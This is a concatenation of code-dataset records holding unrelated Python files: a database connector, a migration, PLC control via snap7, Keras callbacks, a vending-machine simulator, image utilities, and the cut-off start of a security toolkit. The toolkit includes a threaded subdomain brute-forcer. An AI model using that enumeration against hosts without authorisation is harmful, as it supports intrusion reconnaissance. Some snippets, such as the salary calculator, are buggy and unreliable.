for creating globenet controllers'\n _template_dir = 'controller'\n use_cheeta = True\n\n\nclass GlobenetGenerate(command.Command):\n usage = 'CONTROLLER_NAME'\n summary = 'generate parts of your project'\n group_name = 'globenet'\n parser = command.Command.standard_parser(simulate=True, quiet=True, overwrite=True, interactive=True)\n\n def command(self):\n template = ControllerTemplate('controller')\n if not self.args:\n if self.interactive:\n controllername = self.challenge('Enter controller name')\n else:\n raise command.BadCommand('You must provider a CONTROLLER_NAME')\n else:\n controllername = self.args[0]\n vars = {'controller': controllername}\n vars.update(self.parse_vars(self.args[1:]))\n template.run(self, 'controllers', vars)\n if os.path.exists('config.ini'):\n with open('config.ini', 'r') as (f):\n c = f.read()\n config = yaml.load(c)\n else:\n config = {}\n if 'controllers' not in config:\n config['controllers'] = []\n config['controllers'].append({'class': 'controllers.%s.%s' % (controllername, controllername.capitalize()), \n 'url': controllername})\n with open('config.ini', 'w+') as (f):\n f.write(yaml.dump(config))","sub_path":"pycfiles/globenet-0.2-py2.5/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"22586683","text":"import csv \nfrom datetime import datetime\nfrom odps import ODPS \nimport time \nimport uuid \nimport os \nfrom .logger_setting import logger \n\n\n# Defining ODPS specific class to work with \n\nclass OdpsConnector: \n\n def connect(self, accessId, accessKey, project, endPoint, tunnelEndPoint, retry_time = 0, buffering = 5):\n attempt = 0\n\n while attempt == 0 or attempt < retry_time:\n try: \n logger.info(\"Connecting...\") \n\n self.connection = ODPS(\n access_id = accessId\n , secret_access_key = accessKey\n , project = project\n , endpoint = endPoint \n ,tunnel_endpoint = tunnelEndPoint\n ) \n logger.info(\"Connection established.\")\n return True \n\n except Exception as e:\n attempt += 1\n issue = e \n message = \"Attempt {}. {}. Retrying .....\".format(attempt, issue)\n logger.error(message) \n time.sleep(buffering) \n continue \n\n raise RuntimeError(\"Can not access to ODPS due to {}\".format(issue)) \n\n\n\n def read_sql(self, file_path):\n with open(file_path, \"r\", encoding = \"utf-8\") as file:\n query = file.read()\n\n return query \n \n\n\n def extract_header(self, csv_file_path): \n with open(csv_file_path, \"r\", newline = \"\") as file:\n reader = csv.reader(file)\n header = \",\".join(next(reader))\n\n return header \n\n\n\n def run_query(self, query, return_data = False, retry_time = 0, buffering = 5): \n \n attempt = 0\n\n while attempt == 0 or attempt < retry_time:\n try:\n logger.info(\"Querying.....\") \n\n with self.connection.execute_sql(query, None, 1, hints = {\"odps.sql.submit.mode\" : \"script\"}).open_reader() as reader:\n logger.info(\"Query is finished\")\n\n if return_data == True: \n return reader.to_pandas() \n else: \n return reader \n except Exception as e:\n attempt += 1\n issue = e \n message = \"Attempt {}. {}. Retrying .....\".format(attempt, issue)\n logger.error(message) \n time.sleep(buffering) \n continue \n \n raise RuntimeError(\"Cannot query from ODPS due to: {}\".format(issue)) \n\n\n\n def dump_to_csv(self, query, storage_path, filename = None, retry_time = 0, buffering = 5): \n if not filename:\n filename = str(uuid.uuid4())\n\n filename = filename + \".csv\"\n\n filepath = os.path.join(storage_path, filename)\n\n reader = self.run_query(query, retry_time = retry_time, buffering = buffering)\n logger.info(\"Done dumping to csv file {}\".format(filename))\n with open(filepath, \"w\", encoding =\"utf-8\") as file:\n writer = csv.writer(file, delimiter = \",\", quoting = csv.QUOTE_NONNUMERIC\n , lineterminator = \"\\n\")\n \n writer.writerow(reader._schema.names)\n\n for record in reader: \n writer.writerow(record[0:])\n \n return filepath\n \n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pyool/pyodps.py","file_name":"pyodps.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"553840217","text":"\"\"\"many-to-many relationship between collections and entities\n\nRevision ID: 8526f853643a\nRevises: cc03d89e76c8\nCreate Date: 2016-05-02 12:31:12.457470\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nrevision = '8526f853643a'\ndown_revision = 'cc03d89e76c8'\n\n\ndef upgrade():\n op.create_table('collection_entity',\n sa.Column('entity_id', sa.String(length=32), nullable=True),\n sa.Column('collection_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['collection_id'], ['collection.id'], ),\n sa.ForeignKeyConstraint(['entity_id'], ['entity.id'], )\n ) # noqa\n bind = op.get_bind()\n meta = sa.MetaData()\n meta.bind = bind\n meta.reflect()\n entity_table = meta.tables['entity']\n collection_entity_table = meta.tables['collection_entity']\n rp = bind.execute(sa.select([entity_table]))\n for ent in rp.fetchall():\n if ent['collection_id'] is None:\n continue\n q = collection_entity_table.insert({\n 'entity_id': ent['id'],\n 'collection_id': ent['collection_id']\n })\n bind.execute(q)\n op.drop_constraint('entity_collection_id_fkey', 'entity',\n type_='foreignkey')\n op.drop_column('entity', 'collection_id')\n\n\ndef downgrade():\n op.add_column('entity', sa.Column('collection_id', sa.INTEGER(), autoincrement=False, nullable=True)) # noqa\n op.create_foreign_key('entity_collection_id_fkey', 'entity', 'collection', ['collection_id'], ['id']) # noqa\n op.drop_table('collection_entity')\n","sub_path":"aleph/migrate/versions/8526f853643a_many_collections_entities.py","file_name":"8526f853643a_many_collections_entities.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264904296","text":" #salary calculator\n#Q. An employee gets paid(hours worked)*(base pay), for each hours upto 40 hours, for every hour over 40 hours, they get ovewrtime =(base pay)*1.5. calculate total salary.\n\n#storing base pay of the employee\nbasePay=input(\"enter the base pay of the employee >\")\n\n#storing normal working hours of an employee\ntotalHours=input(\" enter the total number of hours worked upto 40hours >\")\n\n# storing extra hours worked by an employee\nextraHours=input(\"extra hours worked >\")\n\n#noraml pay of an employee\nsalary= (float(basePay)*totalHours)\n\n#pay for extra hours\nsalaryForOvertime= (float(basePay)*1.5*extraHours)\n\n#pay after including overtime\ntotalSalary=salaryForOvertime+salary\n\n#result\nprint(totalSalary)\n","sub_path":"salary.python.py","file_name":"salary.python.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"516558645","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport snap7\n# import plc as PLC #导入前面的plc.py文件(注意两个py文件在一个文件夹)\nfrom snap7.util import * #对位操作的函数要导入该库\n\n#定义的函数可直接对QX.X一个位进行操作\ndef Writeoutput(dev,byte,bit,cmd):\n data=dev.read_area(0x82,0,byte,1)#0x82表示输出Q,byte表示起始地址(Q0),1表示类型为byte,cmd位置的值(True或False)\n set_bool(data,byte,bit,cmd) #置Qbyte.bit(即Q0.4)为cmd(即True)\n dev.write_area(0x82,0,byte,data)#同样,进行写数据操作\n \n#该函数只进行了读操作\ndef Readoutput(dev,byte,bit):\n data=dev.read_area(0x82,0,byte,1)\n status=get_bool(data,byte,bit) #获取位状态\n return status\n\nmyplc=snap7.client.Client()\nmyplc.connect('192.168.2.1', rack=0,slot=1) #建立连接(相关信息去TIA看,IP,机架和插槽)\nprint(myplc.get_connected()) # 测试是否通讯成功\n\n#使用plc.py里构建的两个函数(写、读)\nWriteoutput(myplc,0,6,True) #该函数效果就是写Q0.4为True\nstatus=Readoutput(myplc,0,6) #该函数效果就是读取Q0.4的值\nprint(status)\n","sub_path":"read_write_plc.py","file_name":"read_write_plc.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"16128453","text":"import os\nimport sys\nimport pdb\n\nimport keras\nimport numpy as np\nimport tensorflow as tf\nfrom keras.callbacks import (\n TerminateOnNaN,\n ModelCheckpoint,\n LearningRateScheduler,\n TensorBoard,\n ReduceLROnPlateau\n)\n\nfrom .metrics import Metrics\nfrom .visualize import plot_confusion_matrix\n\n\ndef lr_scheduler(epoch, lr):\n\tif epoch <= 20:\n\t\treturn lr*0.95\n\telif epoch <= 40:\n\t\treturn lr*0.93\n\telif epoch <= 80:\n\t\treturn lr*0.9\n\ndef create_callbacks(args, generator):\n\n\tfilepath = os.path.join(os.path.dirname(__file__), '..', 'model_data', 'weights', args.topic)\n\n\tlog_dir = os.path.join(os.path.dirname(__file__), '..', 'model_data', 'logs', args.topic)\n\n\tcallbacks = []\n\n\tcallbacks.append(TerminateOnNaN())\n\n\tcallback_checkpoint = ModelCheckpoint(\n\t\tfilepath = os.path.join(filepath, '{epoch:03d}-{val_categorical_accuracy:.5f}.hdf5'),\n\t\tmonitor = 'val_categorical_accuracy',\n\t\tverbose = 1,\n\t\tsave_best_only = True,\n\t\tsave_weights_only = True\n\t)\n\n\tcallbacks.append(callback_checkpoint)\n\n\tcallback_lr_scheduler = LearningRateScheduler(\n\t\tschedule = lr_scheduler,\n\t\tverbose = 1\n\t)\n\n\tcallbacks.append(callback_lr_scheduler)\n\n\tcallback_tensorboard = TensorBoard(\n\t\tlog_dir = log_dir,\n\t\thistogram_freq = 0,\n\t\twrite_graph = True,\n\t\twrite_grads = True,\n\t\twrite_images = True,\n\t\tbatch_size = args.batch_size\n\t)\n\n\tcallbacks.append(callback_tensorboard)\n\n\tcallback_benchmark = Benchmark(\n\t\tgenerator = generator,\n\t\ttensorboard = callback_tensorboard,\n\t\tf1_score = True,\n\t\tprecision = True,\n\t\trecall = True,\n\t\tconfusion_matrix = False,\n\t\tverbose = 1\n\t)\n\n\tcallbacks.append(callback_benchmark)\n\n\treturn callbacks\n\n\n\nclass Benchmark(keras.callbacks.Callback):\n\tdef __init__ (\n\t\tself,\n\t\tgenerator,\n\t\ttensorboard = None,\n\t\tf1_score = False,\n\t\tprecision = False,\n\t\trecall = False,\n\t\tconfusion_matrix = False,\n\t\tverbose = 1\n\t):\n\n\t\tself.generator = generator\n\t\tself.tensorboard = tensorboard\n\t\tself.verbose = verbose\n\t\tself.f1_score = f1_score\n\t\tself.precision = precision\n\t\tself.recall = recall\n\t\tself.confusion_matrix = confusion_matrix\n\n\t\tlabels = sorted(list(self.generator.class_indices.keys()))\n\t\ty_true = self.generator.classes.tolist()\n\t\tself.metrics = Metrics(labels=labels, y_true=y_true)\n\n\t\tsuper(Benchmark, self).__init__()\n\n\tdef on_epoch_end(self, epoch, logs=None):\n\t\tself.generator.reset()\n\t\tself.metrics.y_pred = np.argmax(self.model.predict_generator(self.generator, verbose=1), axis=-1).tolist()\n\t\tif self.tensorboard is not None and self.tensorboard.writer is not None:\n\t\t\tsummary = tf.Summary()\n\t\t\tif self.f1_score:\n\t\t\t\tsummary_value = summary.value.add()\n\t\t\t\tlogs['f1_score'] = self.metrics.compute_f1_score()\n\t\t\t\tsummary_value.simple_value = logs['f1_score']\n\t\t\t\tsummary_value.tag = \"F1_score\"\n\n\t\t\tif self.precision:\n\t\t\t\tsummary_value = summary.value.add()\n\t\t\t\tlogs['precision'] = self.metrics.compute_precision()\n\t\t\t\tsummary_value.simple_value = logs['precision']\n\t\t\t\tsummary_value.tag = \"Precision\"\n\n\t\t\tif self.recall:\n\t\t\t\tsummary_value = summary.value.add()\n\t\t\t\tlogs['recall'] = self.metrics.compute_recall()\n\t\t\t\tsummary_value.simple_value = logs['recall']\n\t\t\t\tsummary_value.tag = \"Recall\"\n\n\t\tif self.confusion_matrix:\n\t\t\tlogs['confusion_matrix'] = self.metrics.compute_confusion_matrix()\n\t\t\tif epoch % 10 == 0:\n\t\t\t\tplot_confusion_matrix(\n\t\t\t\t\tconfusion_matrix = confusion_matrix,\n\t\t\t\t\tclasses = metrics.labels,\n\t\t\t\t\tnormalize = True,\n\t\t\t\t\ttitle = 'Normalized confusion matrix',\n\t\t\t\t)\n\t\tfor metrics, values in logs.items():\n\t\t\tprint('{}: {}'.format(metrics, values))\n\t\tprint()\n","sub_path":"utils/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"526750247","text":"import csv\nimport os\nfrom random import randint, uniform\n\n# A_csv_to_dicts.py\n\n# File converts the csv files into the required data structures (dictionaries)\n\n\n# denominations dictionary converter\ndef curr_to_dict(currency_file):\n denominations = {}\n with open(currency_file, 'r') as my_file:\n reader = csv.reader(my_file)\n for row in reader:\n value = []\n for column in row:\n value.append(column)\n denominations[row[0]] = value[1:]\n return denominations\n\n\n# denominations stock dictionary converter\ndef denom_stock_to_dict(stock_file, currency):\n denom_stock = {}\n\n with open(stock_file, 'r') as my_file:\n reader = csv.reader(my_file)\n value = {}\n for row in reader:\n value[row[0]] = int(row[1])\n denom_stock[currency] = value\n return denom_stock\n\n\n# products stock dictionary converter\ndef products_to_dict(prod_file):\n products = {}\n with open(prod_file, 'r') as my_file:\n reader = csv.reader(my_file)\n for row in reader:\n value = {}\n value['product name'] = row[1]\n value['price'] = float(row[2])\n value['count'] = int(row[3])\n products[int(row[0])] = value\n return products\n\n\n# data in dict format\ncurrency = curr_to_dict('currency.csv')\ndenom_stock = denom_stock_to_dict('dstock.csv', 'GBP')\nproducts = products_to_dict('products.csv')\n\n\n# F_Change.py\ndef change(amount, coins, result=None):\n result = [] if result is None else result\n if len(coins) == 0:\n return len(result), result\n\n max_coin = max(coins)\n coins.remove(max_coin)\n answer = amount // max_coin\n if answer == 0 and max_coin < amount:\n result = result + ([max_coin] * answer)\n return result\n else:\n result = result + ([max_coin] * answer)\n return change(amount % max_coin, coins, result)\n\n\ncoin_list = [200, 100, 50, 20, 10, 5, 2, 1]\n\n\ndef formatter(amount, coins, result=None):\n if amount < 0:\n return []\n result_coins = change(amount, coins, result=None)[1]\n\n change_given = []\n for coin in result_coins:\n change_given.append(str(format(coin / float(100), '.2f')))\n return change_given\n\n# Script adds to the relevent logging files\n\n# B_purchase_logging.py\n\n\ndef add_change_log(code, input_val):\n\n coins_given = formatter(int(float(format\n (input_val - products[code]['price'],\n '.2f')) * 100), [200, 100, 50, 20, 10, 5, 2, 1])\n\n change = [str(code).zfill(2), str(round(input_val, 2))]\n change.extend(coins_given)\n with open('changes.txt', 'a') as my_file:\n my_file.write(', '.join(change))\n my_file.write('\\n')\n\n\ndef add_product_log(code):\n product_log = [str(code).zfill(2), products[code]['product name'],\n products[code]['price'], (products[code]['count'])]\n with open('purchase_log.csv', 'a') as my_file:\n writer = csv.writer(my_file, dialect='excel')\n writer.writerow(product_log)\n\n\ndef add_denom_log(code, input_val):\n coins_given = formatter(int(float(format\n (input_val - products[code]['price'],\n '.2f')) * 100), [200, 100, 50, 20, 10, 5, 2, 1])\n for coin in coins_given:\n denom_log = [coin, denom_stock['GBP'][coin]]\n with open('dstock_log.csv', 'a') as my_file:\n writer = csv.writer(my_file)\n writer.writerow(denom_log)\n\n\ndef add_denom_log_2():\n with open('dstock_log.csv', 'a') as my_file:\n writer = csv.writer(my_file)\n for row in sorted(denom_stock['GBP'].iteritems()):\n writer.writerow(row)\n\n\n# coin checking function, needs moving\ndef coin_check(code, input_val):\n change_given = format(input_val - products[code]['price'], '.2f')\n coin_list = denom_stock['GBP'].keys()\n if ((change_given in coin_list or change_given is '0.0') and\n change_given is not '0.0'):\n coin_count = denom_stock['GBP'][change_given]\n if coin_count > 0 or change_given is '0.0':\n print(change_given, 'Exact change CAN be returned')\n # this needs to decrement the coin count in denom_log\n else:\n print(change_given)\n else:\n print(change_given)\n\n\n# C_purchase_function.py\n\ndef purchase_test(code, input_val):\n if code in products: # if code exists in product list\n if input_val >= products[code]['price']: # if enough money\n if products[code]['count'] > 0: # if item in stock\n\n change_given = format(input_val -\n products[code]['price'], '.2f')\n coins_given = formatter(int\n (float(format\n (input_val - products[code]['price'],\n '.2f')) * 100),\n [200, 100, 50, 20, 10, 5, 2, 1])\n\n if float(change_given) == 0:\n products[code]['count'] -= 1\n # changes.txt file\n add_change_log(code, input_val) # add change 'log'\n # products.csv file\n add_product_log(code) # add product 'log'\n # if required coins are in stock\n\n elif len(coins_given) > 0:\n if all(denom_stock['GBP'][coin] > 0 for\n coin in coins_given):\n products[code]['count'] -= 1\n for coin in coins_given:\n denom_stock['GBP'][coin] -= 1\n # decrement stock count\n # changes.txt file\n add_change_log(code, input_val) # add change 'log'\n # products.csv file\n add_product_log(code) # add product 'log'\n # dstock.csv file\n add_denom_log(code, input_val) # add denom 'log'\n else:\n with open('changes.txt', 'a') as my_file:\n my_file.write(\"Can't return change\\n\")\n else:\n with open('changes.txt', 'a') as my_file:\n my_file.write(\"Item out of stock\\n\") # if stock count < 1\n else:\n with open('changes.txt', 'a') as my_file:\n my_file.write(\"Insufficient funds\\n\") # if not enough money\n else:\n with open('changes.txt', 'a') as my_file: # if code doesn't exist\n my_file.write(\"Wrong code inserted\\n\")\n coins_given = formatter(int(float(format\n (input_val - products[code]['price'],\n '.2f')) * 100), [200, 100, 50, 20, 10, 5, 2, 1])\n return coins_given\n\n\n# D_dict_to_csv.py\n\n# used to create a temporary products file after orders\ndef prod_updated_csv(in_csv, out_csv):\n if os.path.exists('purchase_log.csv') is False:\n open('purchase_log.csv', 'w')\n upd_products = products_to_dict(in_csv)\n full = products.keys()\n current = upd_products.keys()\n missing = list(set(full) - set(current))\n\n for i in missing:\n upd_products[i] = products[i]\n\n fields = ['product name', 'price', 'count']\n with open(out_csv, 'w') as out_file:\n writer = csv.DictWriter(out_file, fields)\n for key in upd_products:\n writer.writerow(({field: upd_products[key].get(field) for\n field in fields}))\n\n\nprod_updated_csv('purchase_log.csv', 'products_updated_temp.csv')\n\n\n# issue with csv, workaround\ndef add_column(in_csv, out_csv):\n\n with open(in_csv, 'r') as input_file, open(out_csv, 'w') as output_file:\n reader = csv.reader(input_file)\n writer = csv.writer(output_file)\n\n all = []\n row = next(reader)\n row.insert(0, 1)\n all.append(row)\n for k, row in enumerate(reader):\n all.append([str(k + 2)] + row)\n writer.writerows(all)\n\n\nadd_column('products_updated_temp.csv', 'products_updated.csv')\n\n\n# used to create a temporary denom file after orders\ndef denom_updated_csv(in_csv, out_csv):\n if os.path.exists('dstock_log.csv') is False:\n open('dstock_log.csv', 'w')\n upd_denom_stock = denom_stock_to_dict(in_csv, 'GBP')\n full = denom_stock['GBP'].keys()\n current = upd_denom_stock['GBP'].keys()\n missing = list(set(full) - set(current))\n\n for i in missing:\n upd_denom_stock['GBP'][i] = denom_stock['GBP'][i]\n\n coins = list(upd_denom_stock[list(upd_denom_stock.keys())[0]].keys())\n coin_to_counts = []\n for i in coins:\n pair = (str(format(float(i), '.2f')),\n upd_denom_stock[list(upd_denom_stock.keys())[0]][i])\n coin_to_counts.append(pair)\n\n with open(out_csv, 'w') as out_file:\n csv_out = csv.writer(out_file)\n for row in coin_to_counts:\n csv_out.writerow(row)\n\n\ndenom_updated_csv('dstock_log.csv', 'dstock_updated.csv')\n\n\n# E_remove_files.py\n\n# remove the temporary and logging csv files\ndef clean():\n to_remove = ['products_updated_temp.csv',\n 'purchase_log.csv',\n 'dstock_log.csv',\n 'products.csv',\n 'dstock.csv'\n ]\n\n for f in to_remove:\n os.remove(f)\n\n os.rename('products_updated.csv', 'products.csv')\n os.rename('dstock_updated.csv', 'dstock.csv')\n\n\n# main.py\n\ndef main(code, input_val):\n\n # write the results of each simulation to simulations.tct\n if os.path.exists('simulations.txt') is False:\n open('simulations.txt', 'w')\n with open('simulations.txt', 'a') as my_file:\n simulation = [code, format(input_val, '.2f')]\n writer = csv.writer(my_file, dialect='excel')\n writer.writerow(simulation)\n\n # simulation\n purchase_test(code, input_val)\n\n # dict to csv\n prod_updated_csv('purchase_log.csv', 'products_updated_temp.csv')\n add_column('products_updated_temp.csv', 'products_updated.csv')\n denom_updated_csv('dstock_log.csv', 'dstock_updated.csv')\n\n # clean\n clean()\n\n\ndef test(num):\n for i in range(0, num):\n main(randint(1, 4), round(uniform(0.5, 2) / 0.01) * 0.01)\n\n\ntest(100)\n","sub_path":"Python 3/p3_one_script.py","file_name":"p3_one_script.py","file_ext":"py","file_size_in_byte":10310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"531033290","text":"import skimage.io\nimport skimage.transform\nfrom PIL import ImageFile\nimport os\n#import ipdb\n\nimport numpy as np\n\nimport cv2\n\n#def load_image( path, height=128, width=128 ):\n\n# Frizy changed : load image 128-->512\n# def load_image( path, pre_height=146, pre_width=146, height=128, width=128 ):\ndef load_image( path, pre_height=274, pre_width=274, height=256, width=256 ):\n try:\n # img = skimage.io.imread( path ).astype( float )\n img = cv2.imread(path).astype(float)\n except:\n return None\n\n img /= 255.\n\n if img is None: return None\n if len(img.shape) < 2: return None\n if len(img.shape) == 4: return None\n if len(img.shape) == 2: img=np.tile(img[:,:,None], 3)\n if img.shape[2] == 4: img=img[:,:,:3]\n if img.shape[2] > 4: return None\n\n # Frizy changed\n # short_edge = min( img.shape[:2] )\n # yy = int((img.shape[0] - short_edge) / 2)\n # xx = int((img.shape[1] - short_edge) / 2)\n # crop_img = img[yy:yy+short_edge, xx:xx+short_edge]\n # resized_img = skimage.transform.resize( crop_img, [pre_height,pre_width] )\n # resized_img = skimage.transform.resize(img, [pre_height, pre_width])\n resized_img = cv2.resize(img, (pre_width,pre_height) )\n\n rand_y = np.random.randint(0, pre_height - height)\n rand_x = np.random.randint(0, pre_width - width)\n\n resized_img = resized_img[ rand_y:rand_y+height, rand_x:rand_x+width, : ]\n\n return (resized_img * 2)-1 #(resized_img - 127.5)/127.5\n\n\n# Frizy add for mul : load two images\ndef load_image_mul( path_left, path_right, pre_height=274, pre_width=274, height=256, width=256 ):\n try:\n img_left = cv2.imread(path_left).astype(float)\n img_right= cv2.imread(path_right).astype(float)\n except:\n return None\n\n img_left /= 255.\n img_right /= 255.\n\n if img_left is None or img_right is None: return None\n if len(img_left.shape) < 2 or len(img_right.shape)<2 : return None\n if len(img_left.shape) == 4 or len(img_right.shape)==4: return None\n if len(img_left.shape) == 2: img_left = np.tile(img_left[:,:,None], 3)\n if len(img_right.shape) == 2: img_right = np.tile(img_right[:, :, None], 3)\n if img_left.shape[2] == 4: img_left=img_left[:,:,:3]\n if img_right.shape[2] == 4: img_right = img_right[:, :, :3]\n if img_left.shape[2] > 4 or img_right.shape[2]>4 : return None\n\n resized_img_left = cv2.resize(img_left, (pre_width,pre_height) )\n resized_img_right = cv2.resize(img_right, (pre_width, pre_height))\n\n rand_y = np.random.randint(0, pre_height - height)\n rand_x = np.random.randint(0, pre_width - width)\n\n resized_img_left = resized_img_left[ rand_y:rand_y+height, rand_x:rand_x+width, : ]\n resized_img_right = resized_img_right[rand_y:rand_y + height, rand_x:rand_x + width, :]\n\n resized_img_left = (resized_img_left * 2) - 1\n resized_img_right = (resized_img_right * 2) - 1\n\n resized_img_all = np.concatenate((resized_img_left,resized_img_right),axis=2)\n\n return resized_img_all\n\n# Frizy changed: width , height\ndef crop_random(image_ori, width=64,height=64, x=None, y=None, overlap=7):\n if image_ori is None: return None\n random_y = np.random.randint(overlap, height-overlap) if x is None else x\n random_x = np.random.randint(overlap, width-overlap) if y is None else y\n\n image = image_ori.copy()\n crop = image_ori.copy()\n crop = crop[random_y:random_y+height, random_x:random_x+width]\n image[random_y + overlap:random_y+height - overlap, random_x + overlap:random_x+width - overlap, 0] = 2*117. / 255. - 1.\n image[random_y + overlap:random_y+height - overlap, random_x + overlap:random_x+width - overlap, 1] = 2*104. / 255. - 1.\n image[random_y + overlap:random_y+height - overlap, random_x + overlap:random_x+width - overlap, 2] = 2*123. / 255. - 1.\n\n return image, crop, random_x, random_y\n\n\n# Frizy add: for crop for mul images\ndef crop_random_all(image_ori_all, width=64,height=64, x=None, y=None, overlap=7):\n if image_ori_all is None: return None\n random_y = np.random.randint(overlap, height-overlap) if x is None else x\n random_x = np.random.randint(overlap, width-overlap) if y is None else y\n\n image_all = image_ori_all.copy()\n crop = image_ori_all.copy()\n crop = crop[random_y:random_y+height, random_x:random_x+width, 0:3]\n image_all[random_y + overlap:random_y+height - overlap, random_x + overlap:random_x+width - overlap, 0] = 2*117. / 255. - 1.\n image_all[random_y + overlap:random_y+height - overlap, random_x + overlap:random_x+width - overlap, 1] = 2*104. / 255. - 1.\n image_all[random_y + overlap:random_y+height - overlap, random_x + overlap:random_x+width - overlap, 2] = 2*123. / 255. - 1.\n\n return image_all, crop, random_x, random_y","sub_path":"src-mul/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"148921109","text":"import socket,os,threading,queue,time,re,platform\nfrom module import printc\ntry:\n import requests\nexcept:\n msg1=\"\\n[-] 检测到您还没有安装Python3的requests依赖包,请使用 pip install requests 安装\\n\"\n printc.printf(msg1,'red')\n#线程锁 \nlock = threading.Lock()\ncount = 0 #计数\n#获取当前操作系统的信息\nsysteminfo = platform.platform()\ndef test():\n printc.printf(\"124\",\"red\")\n\n#得到一个队列\ndef GetQueue(list):\n PortQueue = queue.Queue(65535)\n for p in list:\n PortQueue.put(p)\n return PortQueue\n\n#导入需要的依赖包,如果用户没有安装则提示用户安装\ndef importModules():\n try:\n import json\n except:\n msg1=\"\\n[-] 检测到您还没有安装Python3的json依赖包,请使用 pip install json 安装\\n\"\n printc.printf(msg1,'red')\n try:\n import requests\n except:\n msg1=\"\\n[-] 检测到您还没有安装Python3的requests依赖包,请使用 pip install requests 安装\\n\"\n printc.printf(msg1,'red')\n\n#通过域名获取ip\ndef getIPByName(host):\n try:\n return socket.gethostbyname(host)\n except:\n return 0\n pass\n\n#读取文件每一行并将文件内容存放在列表中\ndef content2List(add):\n # cwd=os.getcwd()\n dirList=[]\n # add=cwd+\"\\\\dict\\\\directory.txt\"\n f=open(add,\"rb\")\n for line in f.readlines():\n line = str(line)\n line = line.replace(\"\\\\r\",\"\")\n line = line.replace(\"\\\\n\",\"\")\n line = line.replace(\"b\\'\",\"\")\n line = line.replace(\"\\'\",\"\")\n dirList.append(str(line))\n #print(str(line))\n return dirList\n #dirList.append(str(line)[2:-1])\n # line = line.replace(\"\\\\n\",\"\")\n # line = line.replace(\"'\",\"\")\n # line = line.replace(\"b\",\"\")\n #dirList.append(str(line))\n#将内容写入文件\ndef write2file():\n #fileAdd,content\n content = []\n temp = ''\n for i in range(1,101):\n for i1 in range(101,201):\n for i2 in range(201,241):\n temp = str(i)+\",\"+str(i1)+\",\"+str(i2)\n content.append(temp)\n temp = ''\n for i in content:\n print(i)\n fileAdd = \"C:\\\\Users\\\\Ma\\\\Desktop\\\\1.txt\"\n with open(fileAdd,\"w\") as f:\n for i in content:\n f.write(i)\n f.write(\"\\n\")\n f.close()\n msg1 = \"[+] 文件存储在{add}\".format(add=fileAdd)\n print(msg1)\n\n#根据用户输入C:\\targets.txt /use/targets.txt http://www.baidu.com 返回不同字符串或者列表 判断用户输入的是地址还是网址\n#简单点讲就是根据用户输入的来决定输出结果是什么\ndef input2result(s):\n res = s\n if \"//\" not in s:\n res = content2List(s)\n return res\n\n \n#判断是否访问的页面是否存在\ndef ifExist(res):\n symbol=[\"404\",\"NOT FOUND\",\"对不起\"]\n p=\"([\\W\\w]*?)\"\n for i in symbol:\n if i in re.findall(p,res)[0]:\n return False\n break\n else:\n return True\n#bytes 转化为str\ndef bytes2str(input):\n if type(input)==\"bytes\":\n input=bytes.decode(input)\n return input\n#删除文件中无用且重复的信息 \ndef delUseless(add):\n try:\n s=[]\n f=open(add,\"r+\")\n for i in f.readlines():\n i=i.replace(\"\\n\",\"\") \n s.append(i)\n f.close()\n s=list(set(s))\n with open(add,\"w+\") as f:\n for i in s:\n f.write(i+\"\\n\")\n f.close()\n except:\n msg1=\"[-] 是不是路径输错了呢?\"\n printc.printf(msg1,\"red\")\n#将爬取的res转化为标准res.text的格式\ndef change2standard(res):\n try:\n if res.encoding==\"ISO-8859-1\":\n # res.encoding=\"utf-8\n result=res.text.encode(res.encoding).decode('GBK')\n #result=res.text.decode(res.encoding).encode(\"utf8\")\n else:\n result=res.text\n return bytes2str(result)\n except:\n if res.encoding==\"ISO-8859-1\":\n # res.encoding=\"utf-8\n #result=res.text.decode(res.encoding).encode(\"gbk\")\n result=res.text.encode(res.encoding).decode('utf8')\n else:\n result=res.text\n return bytes2str(result)\n\n\n#获取子域名类\nclass getSubdomainNames(threading.Thread):\n def __init__(self,subdomains,domain,protocol):\n threading.Thread.__init__(self)\n self.subdomains=subdomains\n self.domain=domain\n self.protocol=protocol\n self.p=\"([\\W\\w]*?)\"\n self.p1=\"([\\W\\w]*?)\"\n def run(self):\n global lock,count\n domain=self.domain\n while not self.subdomains.empty():\n subdomain=self.subdomains.get()\n # domain=httpOrHttps(domain)+\"://\" +subdomain+\".\"+domain\n domain=httpOrHttps(self.protocol)+\"://\" +subdomain+\".\"+domain\n # print(domain)\n #lock.acquire()\n try: \n res=requests.get(domain,timeout=2)\n result=change2standard(res)\n # print(result)\n # if ifExist(res)==True:\n if (re.findall(self.p,result)):\n title=(re.findall(self.p,result)[0])\n elif re.findall(self.p1,result):\n title=(re.findall(self.p1,result)[0])\n else:\n title=' '\n title=title.replace(\"\\n\",\"\")\n title=title.replace(\"\\r\",\"\")\n title=title.replace(\"\\t\",\"\")\n title=title.replace(\" \",'')\n count=count+1\n msg1=\"[+] \"+domain+\" \"+title\n printc.printf(msg1,'green')\n except:\n # msg2=domain+\"不可访问\"\n # printc.printf(msg2,'red')\n pass\n #lock.release()\n#根据不同的类型选择不同的字典 1 subnames_school 2 subnames_gov 3 subnames_company 0 default subnames ,当然也支持用户自定义字典\ndef dicJudgeByInput(Input):\n if \"Windows\" in systeminfo:\n if 